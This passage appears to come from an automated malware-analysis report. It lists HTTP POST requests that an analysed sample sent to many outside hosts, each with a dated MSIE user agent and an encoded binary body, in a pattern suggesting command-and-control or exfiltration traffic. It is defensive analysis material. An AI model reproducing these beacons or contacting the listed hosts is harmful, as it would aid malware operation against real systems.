72 6c 4d 34 37 49 75 30 30 77 72 2f 59 54 34 2f 73 38 45 34 79 68 39 6c 75 31 6a 34 41 4a 76 6e 59 41 51 6f 4d 76 48 63 65 62 78 65 4f 72 32 31 6a 47 69 63 44 57 70 71 61 4b 78 67 53 50 55 77 36 41 70 65 67 6d 66 7a 39 57 6b 56 39 34 77 43 70 2b 63 47 43 71 46 68 43 71 34 34 44 38 65 4c 69 30 30 69 6e 42 6c 2f 46 65 34 71 6b 70 4c 2f 61 75 44 77 2b 46 52 36 67 4f 58 61 64 5a 31 69 66 32 2b 41 4e 75 36 5a 52 48 51 4e 59 44 79 39 4a 6a 2f 62 63 70 50 67 41 4e 53 35 4d 49 59 6f 58 7a 75 34 36 6f 4b 50 38 79 43 5a 61 2f 79 36 37 77 Data Ascii: cmsGQ6/mrHKCCclFzmQ3erhUo03FeFm6U0HG0qoToDNIUECddFi7TlPtm33TgFBSVURIPTC/7kUa5tLqsMqrdKHYVcLJKpuvTPBweaTUndTQcZLVXA6sqe6YgoxTIYNCAh7kSvfzZNxlGYel378LslXdBWmgemJp/M9EQo7OGcTcifAjAU8sHeDPXex+nOIQt3dXWf8EZsyYoNqaXF4mQfso6qrlXvrumvneuA7qqGzNCOSAkLq9xIACjelBzJ2ADx+zKQO8N3zCkNJNG4PDdJKZ3HE1Uhd523AWB768QVDiMOWUe0BOedwrojBy095uY3CAci7ZCEOHYZeHd0MzsxblI0YhM3JC5oCWxeX/RI1P9aBLmT5mD1SVNLsHAX9VUWHrtH2KM+X0WfJUiqrlM47Iu00wr/YT4/s8E4yh9lu1j4AJvnYAQoMvHcebxeOr21jGicDWpqaKxgSPUw6Apegmfz9WkV94wCp+cGCqFhCq44D8eLi00inBl/Fe4qkpL/auDw+FR6gOXadZ1if2+ANu6ZRHQNYDy9Jj/bcpPgANS5MIYoXzu46oKP8yCZa/y67w
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 73 44 5a 33 52 4b 6a 79 72 48 4b 66 65 5a 54 76 61 7a 56 4f 71 68 75 34 63 45 2b 77 71 74 68 62 58 50 68 4d 52 32 63 39 7a 63 57 31 2b 41 55 42 62 50 58 56 57 69 6c 70 75 79 62 2f 66 67 72 5a 64 58 71 52 61 75 4e 33 42 32 42 6e 57 46 55 6f 5a 47 72 68 44 38 74 44 65 2f 42 33 43 70 50 4c 75 41 4d 45 6b 4b 2b 4b 6c 49 6e 6d 62 32 6e 66 6f 6c 57 76 74 4d 76 69 33 78 56 2b 76 4e 4b 58 5a 54 30 35 58 6a 6e 4a 31 76 70 2f 46 68 55 64 6b 41 38 66 48 70 32 79 42 30 53 69 4c 4e 6f 69 50 4f 44 67 6a 59 74 67 4b 75 37 36 75 2f 57 49 31 36 30 4c 4d 6a 52 54 2f 34 41 41 59 50 70 4d 37 76 49 35 6b 4f 6b 44 51 54 4a 6e 6b 2f 66 73 66 43 5a 4f 78 4e 61 4e 34 45 75 77 63 55 44 5a 6f 59 50 54 48 45 48 4d 77 35 73 68 52 6d 63 4e 2f 47 63 6c 43 33 49 6f 4f 32 38 6d 66 63 50 6d 48 6c 35 30 42 6b 30 72 67 77 42 44 74 32 68 6c 51 4e 38 6c 4c 74 57 6d 6c 74 43 42 64 50 55 49 38 4b 34 47 6e 36 39 78 37 36 39 48 57 2b 35 62 66 6d 53 6a 74 4c 32 38 53 43 42 45 65 32 4a 73 65 73 38 68 72 49 62 6a 31 31 38 59 35 68 37 63 36 61 76 38 47 7a 30 34 38 41 72 76 72 78 34 79 73 6b 44 39 4d 71 34 6f 47 37 66 70 52 5a 6b 6e 54 48 2b 77 6b 6e 71 79 79 6a 58 6d 52 44 54 76 4e 37 6d 55 2b 33 54 56 6b 45 56 37 64 66 62 75 76 68 51 41 69 69 64 56 4d 34 42 49 54 48 6a 65 48 6b 63 56 73 67 68 4f 44 73 33 76 52 42 69 7a 64 6a 39 41 68 45 34 4a 31 4a 42 35 71 45 5a 51 4a 34 44 4c 2f 36 42 59 78 46 79 38 2f 71 76 66 49 65 4c 78 74 36 4f 2b 36 4b 35 45 76 75 78 48 46 79 73 48 54 71 6a 55 49 79 56 4d 4b 48 65 4e 6b 71 70 43 37 67 39 42 44 72 2b 46 4b 73 37 73 6a 58 49 36 72 4a 48 77 33 6a 47 6f 45 6d 68 62 73 54 42 4a 78 32 49 56 54 47 56 30 69 58 55 3d Data Ascii: sDZ3RKjyrHKfeZTvazVOqhu4cE+wqthbXPhMR2c9zcW1+AUBbPXVWilpuyb/fgrZdXqRauN3B2BnWFUoZGrhD8tDe/B3CpPLuAMEkK+KlInmb2nfolWvtMvi3xV+vNKXZT05XjnJ1vp/FhUdkA8fHp2yB0SiLNoiPODgjYtgKu76u/WI160LMjRT/4AAYPpM7vI5kOkDQTJnk/fsfCZOxNaN4EuwcUDZoYPTHEHMw5shRmcN/GclC3IoO28mfcPmHl50Bk0rgwBDt2hlQN8lLtWmltCBdPUI8K4Gn69x769HW+5bfmSjtL28SCBEe2Jses8hrIbj118Y5h7c6av8Gz048Arvrx4yskD9Mq4oG7fpRZknTH+wknqyyjXmRDTvN7mU+3TVkEV7dfbuvhQAiidVM4BITHjeHkcVsghODs3vRBizdj9AhE4J1JB5qEZQJ4DL/6BYxFy8/qvfIeLxt6O+6K5EvuxHFysHTqjUIyVMKHeNkqpC7g9BDr+FKs7sjXI6rJHw3jGoEmhbsTBJx2IVTGV0iXU=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1018User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: duiops.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 78 2f 2f 30 37 6f 73 63 77 33 4b 62 5a 37 49 72 34 73 68 4a 6c 2f 54 32 78 2b 50 52 61 52 31 6c 37 30 37 77 47 69 6d 74 6f 4b 47 54 65 4e 32 47 4d 2f 46 36 73 2b 62 56 79 41 70 2b 6b 5a 63 53 77 72 67 30 76 65 68 6c 69 41 47 31 58 58 49 34 42 2b 44 66 53 76 31 36 78 73 46 36 64 68 44 31 70 4c 65 45 77 38 72 47 57 30 30 71 38 31 43 6a 46 7a 67 42 65 6c 70 76 63 63 4d 2f 54 76 34 59 55 31 44 6f 4a 78 78 39 64 57 59 47 2f 33 70 6a 50 66 6b 6a 4d 70 6b 46 7a 2f 76 52 4d 64 70 6e 30 73 59 4b 38 5a 4e 68 45 4a 77 47 6c 56 51 42 58 6a 4e 74 77 67 68 52 62 6c 6a 33 4b 37 53 44 70 56 6f 36 52 35 38 70 69 4a 69 76 6c 57 6d 35 59 6d 67 2b 6e 6d 48 67 58 68 73 4e 67 32 38 56 34 77 64 51 50 30 62 51 34 64 35 61 39 39 69 65 6d 4a 65 6d 30 70 65 35 6b 30 65 4e 51 55 73 30 33 74 2b 71 41 77 59 6f 71 44 66 6b 65 6c 32 35 6d 4d 4f 58 52 31 34 53 71 33 72 50 30 2f 47 58 6a 32 47 79 7a 67 4d 43 69 4b 78 4e 30 6b 50 49 75 7a 4c 6a 6a 34 7a 79 6e 44 64 52 49 5a 68 65 49 78 37 52 36 78 33 35 48 49 42 76 6a 49 55 7a 4c 65 6a 30 6a 33 59 5a 6a 75 76 33 54 50 32 58 4a 6f 78 44 62 37 4c 31 43 30 31 4d 43 35 78 45 6a 74 66 44 6e 43 41 46 62 6c 61 6b 77 2f 54 57 61 72 4f 74 6f 75 30 2f 6c 37 5a 72 73 44 46 63 63 4d 39 58 72 57 4d 64 34 55 74 47 53 46 49 34 61 36 62 37 79 64 50 4f 57 32 4a 6a 44 43 6d 4e 4c 77 53 47 65 54 6d 45 41 58 33 74 68 77 33 36 31 4c 61 7a 68 4f 46 6f 6e 36 51 75 53 78 44 6d 38 73 66 45 6e 66 6d 76 73 52 47 52 73 31 35 4f 65 70 7a 55 69 46 77 4d 4d 46 70 69 70 6a 6a 69 4a 6c 6d 4a 71 46 44 34 48 53 4b 36 64 75 48 72 43 39 33 4c 65 33 2f 48 4c 68 50 47 4d 6a 31 42 6f 6f 53 77 64 35 64 76 56 52 42 62 4e 34 54 55 32 72 73 51 62 6e 58 4d 78 6c 37 6d 4d 41 35 72 6b 70 50 6b 4b 38 50 79 35 70 51 39 4a 5a 7a 4f 7a 44 70 37 59 30 34 62 75 6c 32 79 68 50 78 6c 4c 37 41 63 Data Ascii: x//07oscw3KbZ7Ir4shJl/T2x+PRaR1l707wGimtoKGTeN2GM/F6s+bVyAp+kZcSwrg0vehliAG1XXI4B+DfSv16xsF6dhD1pLeEw8rGW00q81CjFzgBelpvccM/Tv4YU1DoJxx9dWYG/3pjPfkjMpkFz/vRMdpn0sYK8ZNhEJwGlVQBXjNtwghRblj3K7SDpVo6R58piJivlWm5Ymg+nmHgXhsNg28V4wdQP0bQ4d5a99iemJem0pe5k0eNQUs03t+qAwYoqDfkel25mMOXR14Sq3rP0/GXj2GyzgMCiKxN0kPIuzLjj4zynDdRIZheIx7R6x35HIBvjIUzLej0j3YZjuv3TP2XJoxDb7L1C01MC5xEjtfDnCAFblakw/TWarOtou0/l7ZrsDFccM9XrWMd4UtGSFI4a6b7ydPOW2JjDCmNLwSGeTmEAX3thw361LazhOFon6QuSxDm8sfEnfmvsRGRs15OepzUiFwMMFpipjjiJlmJqFD4HSK6duHrC93Le3/HLhPGMj1BooSwd5dvVRBbN4TU2rsQbnXMxl7mMA5rkpPkK8Py5pQ9JZzOzDp7Y04bul2yhPxlL7Ac
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 55 4a 2b 49 37 67 4d 5a 77 33 4b 2b 6c 36 77 36 43 6d 71 5a 50 53 7a 43 77 4f 53 70 79 79 39 72 35 35 5a 33 70 47 6e 6f 70 38 77 6e 68 6c 2f 63 35 4c 6a 65 44 2f 50 42 75 4d 2f 47 42 4b 6d 6d 72 6f 55 77 62 67 46 76 67 68 7a 6f 51 68 54 45 64 64 6c 50 2f 49 66 65 61 77 41 41 57 50 59 71 56 39 50 69 76 49 72 66 49 6c 34 69 77 45 45 54 79 31 38 66 6e 34 74 36 42 76 56 45 67 35 55 55 4d 50 66 43 6d 2b 55 36 64 79 35 69 54 4e 37 39 37 36 74 45 41 6b 36 76 6d 6d 51 38 30 69 4c 30 2b 64 38 2b 6c 6f 45 67 72 71 5a 79 7a 31 62 62 39 58 42 6f 31 68 54 41 45 52 6a 54 59 53 7a 6b 77 37 55 4b 6d 65 33 59 77 30 72 51 6d 64 59 43 31 69 42 70 37 58 4a 57 41 63 32 78 44 4c 4d 34 47 75 69 55 64 59 37 4e 44 37 33 4e 55 56 54 32 76 75 42 72 47 4b 46 31 58 77 79 68 50 36 38 44 66 78 49 48 2b 31 58 39 6f 6b 48 42 73 4a 54 41 41 4a 2b 58 61 70 4b 31 6a 6a 46 51 4e 5a 2b 45 32 77 32 38 68 32 4d 76 66 75 53 50 37 7a 65 68 34 35 4d 52 4d 30 71 7a 32 78 30 61 30 73 7a 5a 6a 56 32 6d 77 4a 6d 70 66 6f 2b 34 58 73 35 68 50 4b 6b 4c 43 73 38 2f 77 59 43 78 74 43 73 57 6d 34 51 4e 43 6c 66 6c 58 43 2f 2b 33 67 57 4a 76 51 4e 5a 66 5a 4c 78 72 72 65 35 52 5a 32 4e 70 6b 33 74 37 47 65 4d 46 4a 64 67 6c 44 2f 5a 4b 42 55 6c 32 37 6b 2b 66 65 67 74 69 49 5a 54 44 75 30 67 4c 31 45 30 38 70 2f 31 6a 75 34 68 77 37 51 51 59 31 32 56 52 32 4c 59 52 53 57 33 6e 4a 64 32 4e 34 31 47 31 39 51 32 39 49 45 6c 6f 4d 6e 78 6d 64 4a 55 75 46 69 52 77 69 43 6f 63 4c 6f 5a 71 53 41 44 6c 36 30 45 62 2b 2b 42 49 54 6b 36 32 55 6b 33 56 59 35 31 6f 48 2b 32 78 4c 4d 44 4d 46 6e 44 42 4b 41 58 68 53 52 30 31 6c 4e 4c 54 79 74 45 4a 2f 55 6b 52 7a 48 6b 33 4d 6a 6e 51 62 6a 44 70 7a 4d 6d 4d 31 77 42 6a 6b 54 2b 64 41 3d 3d Data Ascii: UJ+I7gMZw3K+l6w6CmqZPSzCwOSpyy9r55Z3pGnop8wnhl/c5LjeD/PBuM/GBKmmroUwbgFvghzoQhTEddlP/IfeawAAWPYqV9PivIrfIl4iwEETy18fn4t6BvVEg5UUMPfCm+U6dy5iTN7976tEAk6vmmQ80iL0+d8+loEgrqZyz1bb9XBo1hTAERjTYSzkw7UKme3Yw0rQmdYC1iBp7XJWAc2xDLM4GuiUdY7ND73NUVT2vuBrGKF1XwyhP68DfxIH+1X9okHBsJTAAJ+XapK1jjFQNZ+E2w28h2MvfuSP7zeh45MRM0qz2x0a0szZjV2mwJmpfo+4Xs5hPKkLCs8/wYCxtCsWm4QNClflXC/+3gWJvQNZfZLxrre5RZ2Npk3t7GeMFJdglD/ZKBUl27k+fegtiIZTDu0gL1E08p/1ju4hw7QQY12VR2LYRSW3nJd2N41G19Q29IEloMnxmdJUuFiRwiCocLoZqSADl60Eb++BITk62Uk3VY51oH+2xLMDMFnDBKAXhSR01lNLTytEJ/UkRzHk3MjnQbjDpzMmM1wBjkT+dA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 70 77 6c 63 30 41 4b 38 55 79 69 36 44 34 72 36 39 55 76 4b 41 59 58 38 6c 30 77 53 45 48 4f 4b 56 6a 72 2b 2f 77 69 63 6b 75 6e 6f 43 37 46 55 4b 62 66 36 72 47 79 31 59 7a 36 74 76 51 66 65 39 2f 4c 56 54 6e 59 55 78 74 51 77 4c 69 38 31 4f 76 5a 6b 6e 67 4f 4b 70 4d 6a 54 79 54 70 69 5a 68 71 66 57 52 57 61 53 6b 4a 44 4f 79 35 63 65 38 6d 30 5a 35 51 42 2b 78 77 37 39 48 55 6f 65 74 75 64 47 6e 58 58 35 45 79 68 67 78 64 4b 44 38 52 70 2f 4c 46 54 37 6d 49 57 64 38 4d 64 5a 38 70 76 79 45 48 62 59 2f 75 6f 78 61 62 68 51 62 4e 4c 39 79 6d 64 42 30 67 53 4e 43 46 56 37 33 6a 53 6e 31 68 47 4d 2f 30 34 65 49 71 6a 68 66 2f 2b 47 47 44 36 56 4a 5a 44 41 57 65 38 50 32 50 39 38 53 5a 67 62 55 7a 71 52 70 58 4c 55 65 79 6a 6e 63 43 41 31 42 64 35 54 6e 4b 49 47 71 49 57 33 30 42 69 39 70 52 4f 63 71 57 4e 53 4e 74 2b 4a 2b 42 41 66 57 72 4c 68 42 75 41 61 65 43 54 77 65 71 76 35 59 4d 39 35 47 33 4c 4e 7a 68 7a 44 6b 4a 48 66 77 6b 38 6b 35 47 67 6d 47 53 4e 34 64 4b 77 54 50 43 76 32 39 69 6f 52 57 69 62 45 44 63 35 2b 64 78 46 41 70 77 59 47 79 6f 53 64 72 5a 62 46 50 54 39 33 61 65 38 5a 37 6c 34 6b 4a 73 38 65 34 42 65 35 42 77 65 67 4f 58 35 62 31 78 75 75 38 52 75 66 78 55 56 59 74 6b 64 61 75 57 4a 59 48 2f 4e 70 64 2f 62 6b 78 33 74 6a 6a 45 6b 65 67 71 49 52 36 44 71 43 6b 35 73 4d 34 48 30 70 66 65 62 69 4d 6e 6c 54 51 4b 4e 33 66 59 51 69 4b 4c 4f 41 38 2b 6f 6e 51 70 31 31 54 6f 5a 61 6e 72 33 32 6b 6b 71 6e 75 31 75 54 4b 73 36 55 7a 33 52 44 32 66 46 78 72 55 34 63 59 51 2f 66 77 78 68 6d 79 55 5a 39 70 4c 32 55 73 7a 51 35 66 61 57 73 70 47 30 50 72 57 53 36 38 74 4d 65 2b 41 73 44 67 53 6f 76 67 35 35 52 65 72 53 2b 77 56 79 53 69 6a 59 47 4e 72 2b 69 63 6b 43 64 2f 34 3d Data Ascii: pwlc0AK8Uyi6D4r69UvKAYX8l0wSEHOKVjr+/wickunoC7FUKbf6rGy1Yz6tvQfe9/LVTnYUxtQwLi81OvZkngOKpMjTyTpiZhqfWRWaSkJDOy5ce8m0Z5QB+xw79HUoetudGnXX5EyhgxdKD8Rp/LFT7mIWd8MdZ8pvyEHbY/uoxabhQbNL9ymdB0gSNCFV73jSn1hGM/04eIqjhf/+GGD6VJZDAWe8P2P98SZgbUzqRpXLUeyjncCA1Bd5TnKIGqIW30Bi9pROcqWNSNt+J+BAfWrLhBuAaeCTweqv5YM95G3LNzhzDkJHfwk8k5GgmGSN4dKwTPCv29ioRWibEDc5+dxFApwYGyoSdrZbFPT93ae8Z7l4kJs8e4Be5BwegOX5b1xuu8RufxUVYtkdauWJYH/Npd/bkx3tjjEkegqIR6DqCk5sM4H0pfebiMnlTQKN3fYQiKLOA8+onQp11ToZanr32kkqnu1uTKs6Uz3RD2fFxrU4cYQ/fwxhmyUZ9pL2UszQ5faWspG0PrWS68tMe+AsDgSovg55RerS+wVySijYGNr+ickCd/4=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 996User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ruzee.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 37 4a 54 63 6d 77 36 47 50 59 69 73 32 42 4c 55 65 6f 79 37 48 51 61 6a 74 33 43 4d 57 66 70 7a 38 49 52 62 6b 76 34 45 4e 58 67 72 30 41 4a 53 63 6c 77 35 46 4f 59 68 73 31 41 4b 54 64 6d 78 36 47 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6b 75 34 44 4e 57 67 71 30 39 4a 53 62 6c 76 35 45 4f 58 68 72 31 41 4b 54 64 6d 77 36 47 50 59 69 73 32 42 4c 55 65 6f 78 37 47 51 5a 6a 74 32 43 4d 56 66 70 7a 38 49 52 62 6b 76 34 45 4e 58 67 72 30 41 4a 53 63 6d 77 35 46 4f 59 68 73 31 42 4b 55 64 6f 78 36 47 51 5a 69 74 32 43 4d 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 66 71 7a 39 4a 53 63 6c 77 35 46 4f 59 68 72 31 41 4b 54 64 6d 78 36 47 50 5a 69 74 32 42 4c 56 65 6f 79 37 48 51 61 6a 75 33 44 4d 57 66 71 7a 39 49 52 62 6b 76 35 45 4e 58 67 72 30 39 4a 54 63 6d 77 36 46 50 59 69 73 31 42 4b 55 64 6f 78 37 47 51 61 6a 74 33 43 4d 56 66 70 7a 38 49 52 61 6b 75 34 44 4e 57 66 71 7a 39 49 53 62 6b 76 35 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 4f 59 68 73 32 42 4c 55 64 6f 78 37 47 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6c 76 34 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4d 56 65 70 7a 38 49 52 62 6b 75 34 44 4e 57 67 71 30 39 4a 53 63 6c 77 35 46 4f 59 68 73 31 42 4b 54 64 6d 78 36 47 50 59 69 73 32 42 4c 55 65 6f 79 37 48 51 61 6a 74 33 44 4d 56 66 71 7a 39 49 53 62 6b 78 36 47 50 5a 69 74 32 42 4c 55 65 6f 79 37 48 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6b 76 34 44 4e 57 67 71 30 39 49 53 62 6c 76 35 45 4e 58 68 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 69 74 32 43 4c 56 65 70 79 38 48 52 61 6a 75 33 44 4e 57 66 71 7a 39 49 53 62 6c 76 35 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 68 73 31 42 4c 55 65 6f 79 37 48 51 5a 6a 74 33 43 4d 56 66 70 7a 38 48 52 61 6b 75 34 44 4e 57 67 71 30 39 4a 53 63 6c 77 36 46 4f 59 68 73 31 42 4b 55 64 6f 78 37 47 50 5a 69 74 32 43 4c 56 65 70 79 38 48 52 61 6a 75 34 45 4e 57 67 71 30 39 4a 53 63 6c 76 35 45 4f 58 68 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4c 56 65 70 79 38 48 52 61 6a 75 33 44 4e 57 66 71 7a 39 49 53 63 6c 76 35 45 4f 58 68 72 31 41 4b 54 64 6d 77 36 46 50 59 69 73 32 43 4c 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 67 71 30 39 4a 53 63 6c 76 35 45 4f 58 68 72 31 41 4b 54 63 6d 77 36 46 50 59 69 73 32 42 4c 55 65 6f 79 37 48 51 61 6a 75 33 43 4d 56 66 70 7a 38 48 52 61 6b 75 34 44 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4c 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 66 71 7a 39 49 53 62 6c 76 35 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4c 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 66 71 7
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1551User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: fortknox.bmConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 805User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: burstner.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 73 44 5a 33 52 4b 6a 79 72 48 4b 66 65 5a 54 76 61 7a 56 4f 71 68 75 34 63 45 2b 77 71 74 68 62 58 50 68 4d 52 32 63 39 7a 63 57 31 2b 41 55 42 62 50 58 56 57 69 6c 70 75 79 62 2f 66 67 72 5a 64 58 71 52 61 75 4e 33 42 32 42 6e 57 46 55 6f 5a 47 72 68 44 38 74 44 65 2f 42 33 43 70 50 4c 75 41 4d 45 6b 4b 2b 4b 6c 49 6e 6d 62 32 6e 66 6f 6c 57 76 74 4d 76 69 33 78 56 2b 76 4e 4b 58 5a 54 30 35 58 6a 6e 4a 31 76 70 2f 46 68 55 64 6b 41 38 66 48 70 32 79 42 30 53 69 4c 4e 6f 69 50 4f 44 67 6a 59 74 67 4b 75 37 36 75 2f 57 49 31 36 30 4c 4d 6a 52 54 2f 34 41 41 59 50 70 4d 37 76 49 35 6b 4f 6b 44 51 54 4a 6e 6b 2f 66 73 66 43 5a 4f 78 4e 61 4e 34 45 75 77 63 55 44 5a 6f 59 50 54 48 45 48 4d 77 35 73 68 52 6d 63 4e 2f 47 63 6c 43 33 49 6f 4f 32 38 6d 66 63 50 6d 48 6c 35 30 42 6b 30 72 67 77 42 44 74 32 68 6c 51 4e 38 6c 4c 74 57 6d 6c 74 43 42 64 50 55 49 38 4b 34 47 6e 36 39 78 37 36 39 48 57 2b 35 62 66 6d 53 6a 74 4c 32 38 53 43 42 45 65 32 4a 73 65 73 38 68 72 49 62 6a 31 31 38 59 35 68 37 63 36 61 76 38 47 7a 30 34 38 41 72 76 72 78 34 79 73 6b 44 39 4d 71 34 6f 47 37 66 70 52 5a 6b 6e 54 48 2b 77 6b 6e 71 79 79 6a 58 6d 52 44 54 76 4e 37 6d 55 2b 33 54 56 6b 45 56 37 64 66 62 75 76 68 51 41 69 69 64 56 4d 34 42 49 54 48 6a 65 48 6b 63 56 73 67 68 4f 44 73 33 76 52 42 69 7a 64 6a 39 41 68 45 34 4a 31 4a 42 35 71 45 5a 51 4a 34 44 4c 2f 36 42 59 78 46 79 38 2f 71 76 66 49 65 4c 78 74 36 4f 2b 36 4b 35 45 76 75 78 48 46 79 73 48 54 71 6a 55 49 79 56 4d 4b 48 65 4e 6b 71 70 43 37 67 39 42 44 72 2b 46 4b 73 37 73 6a 58 49 36 72 4a 48 77 33 6a 47 6f 45 6d 68 62 73 54 42 4a 78 32 49 56 54 47 56 30 69 58 55 3d Data Ascii: sDZ3RKjyrHKfeZTvazVOqhu4cE+wqthbXPhMR2c9zcW1+AUBbPXVWilpuyb/fgrZdXqRauN3B2BnWFUoZGrhD8tDe/B3CpPLuAMEkK+KlInmb2nfolWvtMvi3xV+vNKXZT05XjnJ1vp/FhUdkA8fHp2yB0SiLNoiPODgjYtgKu76u/WI160LMjRT/4AAYPpM7vI5kOkDQTJnk/fsfCZOxNaN4EuwcUDZoYPTHEHMw5shRmcN/GclC3IoO28mfcPmHl50Bk0rgwBDt2hlQN8lLtWmltCBdPUI8K4Gn69x769HW+5bfmSjtL28SCBEe2Jses8hrIbj118Y5h7c6av8Gz048Arvrx4yskD9Mq4oG7fpRZknTH+wknqyyjXmRDTvN7mU+3TVkEV7dfbuvhQAiidVM4BITHjeHkcVsghODs3vRBizdj9AhE4J1JB5qEZQJ4DL/6BYxFy8/qvfIeLxt6O+6K5EvuxHFysHTqjUIyVMKHeNkqpC7g9BDr+FKs7sjXI6rJHw3jGoEmhbsTBJx2IVTGV0iXU=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 6f 32 63 31 4e 67 33 2b 37 6e 4b 55 70 49 62 51 68 41 67 51 47 38 61 4a 4f 73 68 37 50 6f 68 68 6b 56 65 35 39 4a 47 68 79 6c 76 39 62 6e 63 75 57 43 4c 6e 4a 48 56 31 51 51 72 46 2f 59 38 39 32 33 5a 4e 4e 34 30 5a 34 53 34 4f 54 72 65 79 38 47 35 34 71 4d 34 76 36 48 73 4e 66 52 6b 55 59 72 7a 6a 4a 73 2b 4b 64 68 2b 35 4d 35 46 66 45 62 54 42 44 54 36 37 4d 32 50 4c 35 66 34 2b 76 57 55 74 75 57 6b 4e 32 67 6c 47 6c 4c 70 75 67 6a 2f 74 32 46 50 72 6b 70 66 58 6d 71 47 51 77 64 6e 52 59 68 31 57 6c 52 46 4f 38 52 74 59 42 79 47 46 2b 73 79 51 47 50 4b 6a 63 6a 70 61 48 7a 53 77 48 57 62 66 62 44 32 51 71 4a 73 4f 34 56 59 6c 54 41 49 4e 4e 62 35 52 31 30 31 59 78 4a 48 63 69 7a 49 4a 68 48 72 6d 61 41 4d 57 63 41 7a 6f 6d 55 35 62 58 6d 44 4d 45 7a 2b 37 4d 63 45 6f 54 62 61 61 70 66 52 64 53 48 48 62 6a 64 30 30 77 7a 39 6f 33 4a 42 38 34 6b 43 6e 55 48 6d 62 5a 30 6b 58 5a 6e 4d 4a 66 47 51 70 35 50 69 48 54 6e 4a 41 78 67 63 6d 54 72 65 33 77 2f 77 64 30 42 37 44 39 68 48 74 69 62 7a 71 34 57 66 56 5a 5a 63 4c 6e 68 6d 6d 41 32 37 67 46 4c 46 33 49 4f 57 34 31 2b 46 33 62 54 6e 76 6b 43 6e 44 65 53 49 58 58 4c 56 46 63 70 34 76 51 45 79 64 52 4c 46 39 6a 76 71 56 4f 72 49 76 2f 69 4c 5a 34 59 48 6a 47 5a 43 6b 76 4d 2f 71 62 2f 5a 68 46 39 59 5a 4a 2f 58 5a 46 54 55 58 4b 71 4a 4e 78 5a 46 4d 30 56 2f 75 6c 77 45 55 65 2b 67 78 34 56 37 54 6c 7a 68 75 70 4b 4f 74 35 4e 6f 7a 48 61 71 62 63 75 32 57 54 47 69 55 56 2b 67 68 2b 73 2b 55 2b 44 32 74 69 36 67 34 2f 6d 39 73 31 69 66 51 31 37 50 55 49 33 66 77 74 4a 59 39 6f 72 61 44 37 32 6d 32 77 6c 71 69 49 79 34 71 49 69 70 67 62 31 42 4b 32 55 4b 46 6d 37 35 46 46 63 39 51 31 73 43 71 66 51 39 43 4a 75 68 74 68 75 4a 61 49 43 44 6c 61 46 77 44 2f 30 63 78 50 61 70 75 33 30 42 37 Data Ascii: 